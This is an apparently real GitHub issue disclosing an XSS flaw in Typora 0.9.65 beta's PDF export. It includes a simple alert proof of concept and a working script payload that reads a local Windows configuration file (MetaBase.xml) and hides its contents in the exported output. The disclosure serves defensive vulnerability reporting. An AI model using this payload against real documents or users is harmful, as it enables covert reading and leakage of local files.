Skip to content

Typora(v0.9.65) XSS when exporting to PDF #2232

Closed
@ghost

Description

Tested on Win7
Ver0.9.65beta

<script>alert(document.location)</script>
xss when exporting to PDF

and can resulting to information leak
<script>x=new XMLHttpRequest;x.onload=function(){document.write('\<font style="opacity:.01"\>'+this.responseText+'\<\/font\>')};x.open("GET","file:///C:/Windows/system32/inetsrv/MetaBase.xml");x.send();</script>

Metadata

Metadata

Assignees

No one assigned

    Labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions